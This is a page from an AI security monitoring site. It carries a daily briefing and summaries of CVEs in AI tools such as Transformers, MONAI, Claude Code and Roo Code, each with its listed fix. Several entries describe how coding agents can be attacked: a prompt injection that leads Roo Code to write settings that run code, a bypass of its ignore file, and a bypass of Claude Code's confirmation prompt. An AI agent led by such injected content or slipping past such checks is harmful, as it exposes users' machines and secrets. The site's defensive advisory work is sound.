aisecwatch.com
DashboardVulnerabilitiesNewsResearchArchiveStatsDataset
aisecwatch.com

Real-time AI security monitoring. Tracking AI-related vulnerabilities, safety and security incidents, privacy risks, research developments, and policy changes.

Navigation

VulnerabilitiesNewsResearchDigest ArchiveNewsletter ArchiveSubscribeData SourcesStatisticsDatasetAPIIntegrationsWidgetRSS Feed

Maintained by

Truong (Jack) Luu

Information Systems Researcher

AI Sec Watch

The security intelligence platform for AI teams

AI security threats move fast and get buried under hype and noise. Built by an Information Systems Security researcher to help security teams and developers stay ahead of vulnerabilities, privacy incidents, safety research, and policy developments.

[TOTAL_TRACKED]
2,741
[LAST_24H]
35
[LAST_7D]
173
Daily BriefingWednesday, April 1, 2026
>

Claude Code Source Leaked via npm Packaging Error: Anthropic confirmed that Claude Code's source code (nearly 2,000 TypeScript files and over 512,000 lines of code) was accidentally exposed through an npm package containing a source map file, revealing internal features and creating security risks because attackers can study the system to bypass safeguards. Users who downloaded the affected version on March 31, 2026 may have received trojanized software (compromised code) containing malware.

>

AI Discovers Zero-Days in Vim and GNU Emacs Within Minutes: Researcher Hung Nguyen used Anthropic's Claude Code to quickly discover zero-day exploits (previously unknown security flaws) in Vim and GNU Emacs that allow attackers to execute arbitrary code (run their own commands) by tricking users into opening malicious files, with Claude Code generating working proof-of-concept attacks in minutes.

Latest Intel

page 156/275
VIEW ALL
01

CVE-2025-6638: A Regular Expression Denial of Service (ReDoS) vulnerability was discovered in the Hugging Face Transformers library, sp

security
Sep 12, 2025

A ReDoS vulnerability (regular expression denial of service, where specially crafted input causes a program to use excessive CPU by making regex matching extremely slow) was found in Hugging Face Transformers library version 4.52.4, specifically in the MarianTokenizer's `remove_language_code()` method. The bug is triggered by malformed language code patterns that force inefficient regex processing, potentially crashing or freezing the system.

Critical This Week5 issues
critical

CVE-2026-34162: FastGPT is an AI Agent building platform. Prior to version 4.14.9.5, the FastGPT HTTP tools testing endpoint (/api/core/

CVE-2026-34162NVD/CVE DatabaseMar 31, 2026
Mar 31, 2026
>

Google Addresses Vertex AI Security Issues After Weaponization Demo: Palo Alto Networks revealed security problems in Google Cloud Platform's Vertex AI (Google's service for building and deploying machine learning models) after researchers demonstrated how to weaponize AI agents (autonomous programs that perform tasks with minimal human input), prompting Google to begin addressing the disclosed issues.

>

Meta Smartglasses Raise Privacy Concerns with Built-in AI Recording: Meta's smartglasses include a built-in camera and AI assistant that can describe what the wearer sees and provide information, but raise significant privacy concerns because they can record video of others without their knowledge or consent.

Fix: Update to version 4.53.0, where the vulnerability has been fixed. A patch is available at https://github.com/huggingface/transformers/commit/47c34fba5c303576560cb29767efb452ff12b8be.

NVD/CVE Database
02

CVE-2025-55319: Ai command injection in Agentic AI and Visual Studio Code allows an unauthorized attacker to execute code over a network

security
Sep 11, 2025

CVE-2025-55319 is a command injection vulnerability (a type of attack where an attacker inserts malicious commands into a program's input) in Agentic AI (an AI system that can perform tasks independently) and Visual Studio Code that allows an unauthorized attacker to execute code over a network. The vulnerability stems from improper handling of special characters in commands, which lets attackers run arbitrary code on affected systems.

NVD/CVE Database
03

CVE-2025-59041: Claude Code is an agentic coding tool. At startup, Claude Code executed a command templated in with `git config user.ema

security
Sep 10, 2025

Claude Code, an agentic coding tool (software that can write and execute code with some autonomy), had a vulnerability where a maliciously configured git user email could trigger arbitrary code execution (running unintended commands on a system) when the tool started up, before the user approved workspace access. This affected all versions before 1.0.105.

Fix: Update Claude Code to version 1.0.105 or the latest version. Users with automatic updates enabled will have received this fix automatically; those updating manually should upgrade to version 1.0.105 or newer.

NVD/CVE Database
04

CVE-2025-58764: Claude Code is an agentic coding tool. Due to an error in command parsing, versions prior to 1.0.105 were vulnerable to

security
Sep 10, 2025

Claude Code is a tool that helps AI write and run code, but versions before 1.0.105 had a bug in how it parsed commands that let attackers bypass the safety prompt (the confirmation step that checks if code is safe to run). An attacker would need to sneak malicious content into the conversation with Claude Code to exploit this.

Fix: Update to version 1.0.105 or the latest version. Users with auto-update enabled have already received this fix automatically.

NVD/CVE Database
05

CVE-2025-58756: MONAI (Medical Open Network for AI) is an AI toolkit for health care imaging. In versions up to and including 1.5.0, in

security
Sep 8, 2025

MONAI, an AI toolkit for medical imaging, has a deserialization vulnerability (unsafe unpickling, where untrusted data is converted back into executable code) in versions up to 1.5.0 when loading pre-trained model checkpoints from external sources. While one part of the code uses secure loading (`weights_only=True`), other parts load checkpoints insecurely, allowing attackers to execute malicious code if a checkpoint contains intentionally crafted harmful data.

NVD/CVE Database
06

Dual Thinking and Logical Processing in Human Vision and Multimodal Large Language Models

researchsafety
Sep 8, 2025

Researchers studied how humans use two types of thinking (fast intuitive processing and slower logical reasoning) when looking at images, and tested whether AI systems like multimodal large language models (MLLMs, which process both text and images together) have similar abilities. They found that while MLLMs have improved at correcting intuitive errors, they still struggle with logical processing tasks that require deeper analysis, and segmentation models (AI systems that identify objects in images) make errors similar to human intuitive mistakes rather than using logical reasoning.

IEEE Xplore (Security & AI Journals)
07

CVE-2025-58374: Roo Code is an AI-powered autonomous coding agent that lives in users' editors. Versions 3.25.23 and below contain a def

security
Sep 5, 2025

Roo Code is an AI tool that helps developers write code directly in their editors, but versions 3.25.23 and older have a security flaw where npm install (a command that downloads and sets up code packages) is automatically approved without asking the user first. If a malicious repository's package.json file contains a postinstall script (code that runs automatically during package installation), it could execute harmful commands on the user's computer without their knowledge or consent.

Fix: This is fixed in version 3.26.0.

NVD/CVE Database
08

CVE-2025-58373: Roo Code is an AI-powered autonomous coding agent that lives in users' editors. Versions 3.25.23 and below contain a vul

security
Sep 5, 2025

Roo Code is an AI tool that helps developers write code directly in their editor, but versions 3.25.23 and earlier have a security flaw where attackers can bypass .rooignore (a file that tells Roo Code which files to ignore) using symlinks (shortcuts that point to other files). This allows someone with write access to the workspace to trick Roo Code into reading sensitive files like passwords or configuration files that should have been hidden.

Fix: This is fixed in version 3.26.0.

NVD/CVE Database
09

CVE-2025-58372: Roo Code is an AI-powered autonomous coding agent that lives in users' editors. Versions 3.25.23 and below contain a vul

security
Sep 5, 2025

Roo Code is an AI tool that automatically writes code in your editor, but versions 3.25.23 and earlier have a security flaw where workspace configuration files (.code-workspace files that store project settings) aren't properly protected. An attacker using prompt injection (tricking the AI by hiding malicious instructions in its input) could trick the agent into writing harmful settings that execute as code when you reopen your project, potentially giving the attacker control of your computer.

Fix: Update to version 3.26.0 or later, which fixes this issue.

NVD/CVE Database
10

CVE-2025-58371: Roo Code is an AI-powered autonomous coding agent that lives in users' editors. In versions 3.26.6 and below, a Github w

security
Sep 5, 2025

Roo Code is an AI tool that helps developers write code automatically within their editors. In versions 3.26.6 and earlier, a Github workflow (an automated process that runs tasks in a repository) used unsanitized pull request metadata (information that wasn't checked for malicious content) in a privileged context, allowing attackers to execute arbitrary commands on the Actions runner (a computer that runs automated tasks) through RCE (remote code execution, where an attacker can run commands on a system they don't own). This could let attackers steal secrets, modify code, or completely compromise the repository.

Fix: Update to version 3.26.7.

NVD/CVE Database
Prev1...154155156157158...275Next
critical

CVE-2025-15379: A command injection vulnerability exists in MLflow's model serving container initialization code, specifically in the `_

CVE-2025-15379NVD/CVE DatabaseMar 30, 2026
Mar 30, 2026
critical

CVE-2026-33873: Langflow is a tool for building and deploying AI-powered agents and workflows. Prior to version 1.9.0, the Agentic Assis

CVE-2026-33873NVD/CVE DatabaseMar 27, 2026
Mar 27, 2026
critical

Attackers exploit critical Langflow RCE within hours as CISA sounds alarm

CSO OnlineMar 27, 2026
Mar 27, 2026
critical

CVE-2025-53521: F5 BIG-IP Unspecified Vulnerability

CVE-2025-53521CISA Known Exploited VulnerabilitiesMar 26, 2026
Mar 26, 2026